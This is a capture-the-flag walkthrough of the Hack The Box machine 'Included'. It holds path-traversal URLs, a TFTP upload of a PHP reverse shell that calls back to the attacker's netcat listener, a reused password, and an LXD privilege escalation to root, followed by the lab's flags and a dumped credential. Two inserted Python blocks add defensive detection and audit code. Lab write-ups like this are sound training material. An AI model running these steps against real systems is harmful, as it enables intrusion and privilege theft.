HTB Starting Point – Included

$./ennumeration.sh

[+] 10.10.10.55 scan started...
[-] Open ports : 80 found

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 17:20 CEST
Nmap scan report for 10.10.10.55
Host is up (0.044s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.10.55/?file=index.php
|_https-redirect: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.55 seconds
[+] 10.10.10.55 scan finished...

Open ports detected:
80/tcp open  http   Apache httpd 2.4.29 ((Ubuntu))

Browsing to http://10.10.10.55 redirects to http://10.10.10.55/?file=index.php

Scanning the site with OWASP ZAP:

This machine is vulnerable to a File Inclusion Path Traversal attack.

According to the scanner's description of the finding:

The Path Traversal attack technique allows an attacker access to files, directories, and commands that potentially reside outside the web document root directory. An attacker may manipulate a URL in such a way that the web site will execute or reveal the contents of arbitrary files anywhere on the webserver. Any device that exposes an HTTP-based interface is potentially vulnerable to Path Traversal.

Accessing this URL:
http://10.10.10.55/?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

What does %2F mean?
The % introduces a percent-encoded byte, and the two characters that follow it (2F) are that byte's value in hexadecimal.
Looking in http://www.asciitable.com/ we can see that 0x2F is the character «/».

Decoded, the URL is equivalent to http://10.10.10.55/?file=../../../../etc/passwd (any extra «../» segments above / have no effect).

How is this path constructed?

As discovered earlier, the target runs an Apache web server. Apache's default document root is /var/www/html:

$cd /var/www/html/
$ls
index.html  index.nginx-debian.html

We want to read the passwd file (located in /etc/).

From the document root we need to go up three levels, html/, www/ and var/ (one «../» each), to reach the filesystem root (/).
From there we simply descend into /etc/passwd.
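The decoding and path resolution described above is exactly what a defender needs to reproduce in order to spot this class of request in logs or reject it in an application. The following Python example is added here and is not part of the original write-up: it percent-decodes a `file` parameter the way the server would (including a second pass for double-encoded input), resolves the result against the Apache document root from the write-up, and reports whether it escapes that root. It then runs the check over a few constructed Apache access-log lines; the log lines, client IP and the `flag_traversal` helper are assumptions for the example, not data from the page.

```python
"""Detect `?file=` include parameters that resolve outside the web root.

Added example; not code from the original write-up or from the target
application. The sample log lines below are constructed for illustration.
"""
from __future__ import annotations

from pathlib import PurePosixPath
from urllib.parse import unquote, urlsplit

# Apache's default document root, as used in the write-up.
WEB_ROOT = PurePosixPath("/var/www/html")


def decode_param(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing.

    One unquote() turns %2F into '/', but '%252F' decodes to '%2F' first and
    only becomes '/' on a second pass. Repeating until the value is stable
    catches such double encoding; the round cap keeps the loop bounded.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_include(param: str, root: PurePosixPath = WEB_ROOT) -> PurePosixPath:
    """Resolve a user-supplied path against the document root.

    Each '..' pops one directory but never climbs above '/', mirroring how the
    kernel treats '/../'. An absolute parameter restarts at '/' so that it is
    judged on its own (conservative assumption about how the app concatenates).
    """
    parts = list(root.parts)  # ('/', 'var', 'www', 'html')
    for seg in PurePosixPath(param).parts:
        if seg == "/":
            parts = ["/"]
        elif seg == "..":
            if len(parts) > 1:
                parts.pop()
        elif seg not in ("", "."):
            parts.append(seg)
    return PurePosixPath(*parts)


def escapes_root(param: str, root: PurePosixPath = WEB_ROOT) -> bool:
    """True when the decoded parameter points outside the document root."""
    resolved = resolve_include(decode_param(param), root)
    return resolved != root and root not in resolved.parents


def file_params(request_target: str) -> list[str]:
    """Return the still-encoded values of every `file=` pair in the query string."""
    values = []
    for pair in urlsplit(request_target).query.split("&"):
        name, _, value = pair.partition("=")
        if unquote(name) == "file":
            values.append(value)
    return values


def flag_traversal(log_lines: list[str], root: PurePosixPath = WEB_ROOT) -> list[tuple[str, str, str]]:
    """Scan Apache combined-format lines; return (client, raw_param, resolved_path) per hit."""
    hits = []
    for line in log_lines:
        try:
            client = line.split()[0]
            request_line = line.split('"')[1]   # e.g. 'GET /?file=... HTTP/1.1'
            target = request_line.split()[1]
        except IndexError:
            continue  # not a well-formed combined-log line
        for raw in file_params(target):
            if escapes_root(raw, root):
                hits.append((client, raw, str(resolve_include(decode_param(raw), root))))
    return hits


# Constructed sample access-log lines (not from the target machine).
SAMPLE_ACCESS_LOG = [
    '10.10.14.19 - - [29/May/2020:17:20:01 +0200] "GET /?file=index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '10.10.14.19 - - [29/May/2020:17:25:43 +0200] "GET /?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2345 "-" "Mozilla/5.0"',
    '10.10.14.19 - - [29/May/2020:17:26:10 +0200] "GET /?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2345 "-" "curl/7.68.0"',
    '10.10.14.19 - - [29/May/2020:17:30:02 +0200] "GET /?file=./pages/about.php HTTP/1.1" 200 999 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, raw, resolved in flag_traversal(SAMPLE_ACCESS_LOG):
        print(f"{client} requested file={raw!r} -> resolves to {resolved}")
```

Note that the double-encoded third line only climbs one level, to /var/www/etc/passwd, yet it is still flagged: the check is "outside the document root", not "reached /etc", so an attempt does not need to succeed to be detected.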

The passwd file is shown at the top of the page.

Saving this output to a file, we now have the system's passwd file.

The passwd file suggests a TFTP service is installed on the box.
Is it running? (TFTP uses UDP.)

Let’s use nmap to check it.

sudo nmap -sU -v 10.10.10.55

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 17:53 CEST
Initiating Ping Scan at 17:53
Scanning 10.10.10.55 [4 ports]
Completed Ping Scan at 17:53, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:53
Completed Parallel DNS resolution of 1 host. at 17:53, 0.00s elapsed
Initiating UDP Scan at 17:53
Scanning 10.10.10.55 [1000 ports]
Completed UDP Scan at 18:11, 1087.62s elapsed (1000 total ports)
Nmap scan report for 10.10.10.55
Host is up (0.043s latency).
Not shown: 999 closed ports
PORT   STATE         SERVICE
69/udp open|filtered tftp

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1087.82 seconds
           Raw packets sent: 1454 (42.053KB) | Rcvd: 1099 (62.333KB)

So there is a TFTP service listening here.
We can try to connect and upload a file.

$echo 1 > test.txt
$tftp 10.10.10.55
tftp> put test.txt

Sent 3 bytes in 0.1 seconds

Foothold

We can connect and upload a file, so by combining both findings we can get a reverse shell.
As we have PHP available we can use a PHP reverse shell.

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

Set your HTB IP in the script, then upload it:

tftp> put shell.php

Sent 5669 bytes in 0.6 seconds

The default TFTP root folder is /var/lib/tftpboot.

So, to run the PHP shell we need to request http://10.10.10.55/?file=../../../../var/lib/tftpboot/shell.php

Start a netcat listener to catch the reverse shell:

$nc -lvnp 1234

listening on [any] 1234 ...

Request the shell's URL:
http://10.10.10.55/?file=../../../../var/lib/tftpboot/shell.php

We are in as user www-data.

$ python3 -c "import pty; pty.spawn('/bin/bash')"

www-data@included:/$

Based on the usernames in the passwd file, we can try the passwords found on the previous Starting Point machines.

mike/Sheffield19 works, and we can switch to mike's account.

www-data@included:/$ su mike
Password: Sheffield19

User flag:

mike@included:~$ cat user.txt

a56ef91d70cfbf2cdb8f454c006935a1

Privilege Escalation

mike@included:~$ groups

mike lxd

mike belongs to the lxd group.

The LXD group is a high-privileged Linux group, which can be used to escalate to root.
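Because membership of lxd (like docker) is effectively root, a defender should know exactly who holds it. The following Python example is added here and is not from the original write-up or the target machine: it parses `/etc/group` and `/etc/passwd` content and reports every non-root member of a set of privileged groups. It deliberately also catches users whose *primary* group is a privileged one, since those never appear in the member column of `/etc/group` and are missed by a naive `grep lxd /etc/group`. The file contents and the list of privileged groups below are constructed assumptions for the example.

```python
"""Report non-root members of root-equivalent groups such as lxd.

Added example; not code from the write-up. Sample file contents are
constructed for illustration and do not describe the target machine.
"""
from __future__ import annotations

# Assumption: groups whose membership is treated as root-equivalent for this audit.
PRIVILEGED_GROUPS = {"lxd", "docker", "sudo", "wheel", "disk"}


def parse_group(text: str) -> dict[str, tuple[int, set[str]]]:
    """Map group name -> (gid, supplementary members) from /etc/group content."""
    groups: dict[str, tuple[int, set[str]]] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _password, gid, members = line.split(":", 3)
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def parse_primary_gids(text: str) -> dict[str, int]:
    """Map user name -> primary gid (field 4) from /etc/passwd content."""
    primary: dict[str, int] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        primary[fields[0]] = int(fields[3])
    return primary


def privileged_members(group_text: str, passwd_text: str,
                       privileged: set[str] = PRIVILEGED_GROUPS) -> dict[str, list[str]]:
    """Return {group: sorted non-root members} for each privileged group present.

    Members come from two places: the explicit member list in /etc/group and
    any user whose primary gid in /etc/passwd equals the group's gid. The
    `groups` command shows both; a grep of /etc/group shows only the first.
    """
    groups = parse_group(group_text)
    primary = parse_primary_gids(passwd_text)
    report: dict[str, list[str]] = {}
    for gname in sorted(privileged):
        if gname not in groups:
            continue
        gid, members = groups[gname]
        members = set(members) | {user for user, g in primary.items() if g == gid}
        members.discard("root")
        if members:
            report[gname] = sorted(members)
    return report


# Constructed sample contents (not the real files from the machine).
SAMPLE_GROUP = """root:x:0:
sudo:x:27:
lxd:x:108:mike
mike:x:1000:
"""

SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
mike:x:1000:1000::/home/mike:/bin/bash
builder:x:1001:108::/home/builder:/bin/sh
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""

if __name__ == "__main__":
    # On a live host you would read /etc/group and /etc/passwd instead.
    for group, users in privileged_members(SAMPLE_GROUP, SAMPLE_PASSWD).items():
        print(f"{group}: {', '.join(users)}")
```

In the sample, `builder` has gid 108 as its primary group and is not listed on the `lxd:` line, yet it is reported alongside `mike`; that is the case a single-file grep would silently miss.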

First, clone the following repository and build an Alpine image.

A full description of this attack can be found here: https://www.hackingarticles.in/lxd-privilege-escalation/

$git clone  https://github.com/saghul/lxd-alpine-builder.git

S'està clonant a «lxd-alpine-builder»...
remote: Enumerating objects: 27, done.
remote: Total 27 (delta 0), reused 0 (delta 0), pack-reused 27
S'estan rebent objectes: 100% (27/27), 16.00 KiB | 315.00 KiB/s, fet.
S'estan resolent les diferències: 100% (6/6), fet.

$cd lxd-alpine-builder
$ls

build-alpine  LICENSE  README.md

$sudo ./build-alpine -h

getopt: l’opció «h» necessita un argument
Usage: build-alpine [-h|--help] [-r|--repository <url>]
                   [-R|--release <release>] [-a|--arch <arch>]
                   [PKG...]

$sudo ./build-alpine

Determining the latest release... v3.12
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.12/main/x86_64
Downloading alpine-mirrors-3.5.10-r0.apk
tar: S'ignora la paraula clau desconeguda de la capçalera estesa «APK-TOOLS.checksum.SHA1»
Downloading alpine-keys-2.2-r0.apk
...
Downloading apk-tools-static-2.10.5-r1.apk
tar: S'ignora la paraula clau desconeguda de la capçalera estesa «APK-TOOLS.checksum.SHA1»
alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: OK
Verified OK
Selecting mirror http://mirrors.gigenet.com/alpinelinux/v3.12/main
fetch http://mirrors.gigenet.com/alpinelinux/v3.12/main/x86_64/APKINDEX.tar.gz
(1/19) Installing musl (1.1.24-r8)
(2/19) Installing busybox (1.31.1-r16)
Executing busybox-1.31.1-r16.post-install
(3/19) Installing alpine-baselayout (3.2.0-r6)
Executing alpine-baselayout-3.2.0-r6.pre-install
Executing alpine-baselayout-3.2.0-r6.post-install
(4/19) Installing openrc (0.42.1-r10)
Executing openrc-0.42.1-r10.post-install
(5/19) Installing alpine-conf (3.9.0-r1)
(6/19) Installing libcrypto1.1 (1.1.1g-r0)
(7/19) Installing libssl1.1 (1.1.1g-r0)
(8/19) Installing ca-certificates-bundle (20191127-r2)
(9/19) Installing libtls-standalone (2.9.1-r1)
(10/19) Installing ssl_client (1.31.1-r16)
(11/19) Installing zlib (1.2.11-r3)
(12/19) Installing apk-tools (2.10.5-r1)
(13/19) Installing busybox-suid (1.31.1-r16)
(14/19) Installing busybox-initscripts (3.2-r2)
Executing busybox-initscripts-3.2-r2.post-install
(15/19) Installing scanelf (1.2.6-r0)
(16/19) Installing musl-utils (1.1.24-r8)
(17/19) Installing libc-utils (0.7.2-r3)
(18/19) Installing alpine-keys (2.2-r0)
(19/19) Installing alpine-base (3.12.0-r0)
Executing busybox-1.31.1-r16.trigger
OK: 8 MiB in 19 packages

Transfer the image to the target using Python's SimpleHTTPServer:

python -m SimpleHTTPServer 8888
mike@included:/tmp$ wget 10.10.14.19:8888/alpine-v3.12-x86_64-20200530_1316.tar.gz

--2020-05-30 11:22:29--  http://10.10.14.19:8888/alpine-v3.12-x86_64-20200530_1316.tar.gz
Connecting to 10.10.14.19:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3110856 (3.0M) [application/gzip]
Saving to: ‘alpine-v3.12-x86_64-20200530_1316.tar.gz’

alpine-v3.12-x86_64 100%[===================>]   2.97M  2.01MB/s    in 1.5s    

2020-05-30 11:22:31 (2.01 MB/s) - ‘alpine-v3.12-x86_64-20200530_1316.tar.gz’ saved [3110856/3110856]

mike@included:/tmp$ lxc image import ./alpine-v3.12-x86_64-20200530_1316.tar.gz --alias rootimage

mike@included:/tmp$ lxc init rootimage ignite -c security.privileged=true
Creating ignite

The commands above will import the image and create a privileged container with it.

Next, the host filesystem is mounted at /mnt/root inside the container.

mike@included:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

Device mydevice added to ignite

The command above gives us access to the host's entire filesystem from within the container.

The next set of commands starts the container and drops us into a shell on it.

mike@included:/tmp$ lxc start ignite

mike@included:/tmp$ lxc exec ignite /bin/sh
~ #

Finally, we can navigate to /mnt/root/root/ and read root.txt along with login.sql, which reveals more credentials.

~ # id
uid=0(root) gid=0(root)
~ # cd /mnt/root/root
/mnt/root/root # ls
login.sql  root.txt

/mnt/root/root # cat root.txt

c693d9c7499d9f572ee375d4c14c7bcf

/mnt/root/root # cat login.sql

-- MySQL dump 10.16  Distrib 10.1.44-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost    Database: Markup
-- ------------------------------------------------------
-- Server version 10.1.44-MariaDB-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(100) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'Daniel','>SNDv*2wzLWf');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
